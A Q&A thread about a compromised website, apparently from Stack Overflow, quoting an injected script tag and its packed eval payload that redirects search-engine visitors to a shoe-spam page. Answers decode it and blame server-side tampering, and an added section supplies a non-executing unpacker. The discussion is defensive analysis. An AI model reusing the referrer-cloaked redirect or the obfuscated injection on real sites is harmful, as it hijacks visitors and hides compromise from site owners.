Sesquipedal

Reputation: 228

How does this JavaScript hack work?

I've encountered a strange hack of a website that doesn't belong to me, and I'm trying to help the web admin out by identifying the source of the issue. Here's the diagnosis: Google flags the website with a "This website may be hacked" notice. When following the link from Google, you are redirected to a different, completely unrelated page. If I cancel the page load before redirection and then view the source html, I see that there is a little JavaScript snippet inserted at the very beginning of the document, which apparently is causing the redirection. Now here's the strange bit: The malicious JavaScript only appears when navigating to the page from certain search engines like Google or Bing. If you go to the page directly, nothing is wrong, and even if I go to this page from another search engine like DuckDuckGo, nothing is wrong.

The malicious script itself reads <script type="text/javascript" src="http://www.enternote.fr/superfly.js"></script>. Here is what is at the src link: (with additional tabs and line breaks to make it easier to look at, hopefully)

eval(
    function(p,a,c,k,e,r){
        e=function(c){
            return c.toString(a)
        };
        if(!''.replace(/^/,String)){
            while(c--) 
                r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1
        };
        while(c--)
            if(k[c]) p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
    }('4 1=5.6;7(1.2("8")>0||1.2("9")>0||1.2("a")>0||1.2("b")>0){d.e.f=\'g://h.i.j/3-k-3-l-m-n-c-o.p\'}',
    26,
    26,
    '|s|indexOf|nike|var|document|referrer|if|google|bing|yahoo|aol||window|location|href|http|www|soccerxp|com|shoes|mercurial|superfly|fg|1_176|html'.split('|'),
    0,
    {})
)

I haven't analyzed this in detail, but from the document|referrer|if|google|bing|yahoo|aol||window|location|href... part it seems obvious that this is doing the redirection, and moreover the fact that the redirection only occurs for search traffic is a deliberate act on behalf of the hacker.

However, I'm not sure why the script only appears in the source html if you navigate from a search engine. I'm no hacking expert, but this smells like injection into a server side code. The only alternative I can see is if the script somehow manages to delete itself if the referrer is not one of those it cares about. Is this possible?

So the questions are: Is this a known hack, and if so what is the cure? Is there necessarily some deeper problem with the server side scripts, or could this be a purely JavaScript hack?

Possibly relevant information: The website is made using Network Solutions' Image Cafe feature.

Upvotes: 1

Views: 2160

Answers (2)

T G

Reputation: 501

One possibility is that the .htaccess file has also been hacked, such that it makes a similar check for REFERRER and only supplies the JS code accordingly.

Hosting company inmotionhosting has this advice about the situation:

http://www.inmotionhosting.com/support/website/hacks/cleaning-up-a-htaccess-hack

Which starts off by saying

In this article we'll discuss steps you can take to clean up a .htaccess hack. The .htaccess file is used to primarily setup rewrite rules to control the way your site is accessed.

(I have no affiliation with them - I just came across that article in the same search that landed me on this question.)

It might also be that some Server Side Include code (which you never see on the client side) has been altered. The site owner should log in to the site and examine all his files directly, rather than via a browser.

Upvotes: 0

Denys Séguret

Reputation: 382194

function(p,a,c,k,e,r){ is the signature of one of the script packers used to "encrypt" some code and make it less easily identifiable and readable. But it's stupid and ineffective.

Just change

eval( something )

with

var script = (something);

then you'll see what the encrypted code is:

var s=document.referrer;
if(s.indexOf("google")>0||s.indexOf("bing")>0||s.indexOf("yahoo")>0||s.indexOf("aol")>0){
    window.location.href='http://www.soccerxp.com/nike-shoes-nike-mercurial-superfly-fg-c-1_176.html'
}

So it's just a script changing the location to http://www.soccerxp.... when the user comes from a search engine (as given by referrer).

The real problem the site owner has is that their site could be changed by the attacker. The server's security is compromised and must be fixed.

Upvotes: 5
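The answer above decodes the payload by swapping eval for an assignment, which still hands the untrusted file to a JavaScript engine. The following is an added example, not code from the question or the answer: it reimplements the packer's own substitution step in plain code, so the superfly.js payload can be decoded offline and its indicators (the referrer substrings and the redirect target) pulled out without executing anything. The sample input is the packed listing from the question joined back onto one line; the argument-extraction regex assumes the usual single-quoted `}('payload',radix,count,'w|o|r|d|s'.split('|'),0,{})` layout, and the helper names are my own.

```javascript
// Static unpacker for the "p,a,c,k,e,r" packer seen in superfly.js.
// Added example, not code from the original post.

// Matches the four arguments of the packed call: payload, radix, word count
// and the '|'-joined word table. Assumption: single-quoted strings in which
// only quotes and backslashes are escaped (true for the sample below).
const PACKED_ARGS =
  /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

function unescapeJsString(s) {
  return s.replace(/\\(['"\\])/g, '$1');
}

function parsePacked(source) {
  const m = PACKED_ARGS.exec(source);
  if (!m) throw new Error('not a p,a,c,k,e,r payload');
  return {
    payload: unescapeJsString(m[1]),
    radix: parseInt(m[2], 10),
    count: parseInt(m[3], 10),
    words: unescapeJsString(m[4]).split('|'),
  };
}

// The packer replaced every word with its table index written in `radix`.
// Reversing it is one regex substitution: each \w+ token that is a valid
// index maps back to its word; an empty table slot means the token was
// left as-is by the packer and stands for itself (e.g. "c" in the URL).
function unpack({ payload, radix, count, words }) {
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const key = i.toString(radix);
    table.set(key, words[i] || key);
  }
  return payload.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

function decodePacked(source) {
  return unpack(parsePacked(source));
}

// Indicators an incident responder wants from the decoded code: the
// referrer substrings it keys on and the redirect destination(s).
function extractIndicators(decoded) {
  const referrers = [...decoded.matchAll(/indexOf\("([^"]+)"\)/g)].map((m) => m[1]);
  const urls = [...decoded.matchAll(/https?:\/\/[^\s'"]+/g)].map((m) => m[0]);
  return { referrers, urls };
}

// Constructed sample: the superfly.js listing from the question, joined onto
// one line as it would be served. String.raw keeps every backslash verbatim.
const SUPERFLY_JS = String.raw`eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 1=5.6;7(1.2("8")>0||1.2("9")>0||1.2("a")>0||1.2("b")>0){d.e.f=\'g://h.i.j/3-k-3-l-m-n-c-o.p\'}',26,26,'|s|indexOf|nike|var|document|referrer|if|google|bing|yahoo|aol||window|location|href|http|www|soccerxp|com|shoes|mercurial|superfly|fg|1_176|html'.split('|'),0,{}))`;

const decoded = decodePacked(SUPERFLY_JS);
console.log(decoded);
console.log(extractIndicators(decoded));
```

Running it prints the same three-line script the answer shows, plus the referrer list and the soccerxp.com URL. Because nothing from the fetched file is ever evaluated, the same routine can be pointed at any other packed file found on the server during cleanup; a file the regex does not match is simply reported as not this packer rather than run.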
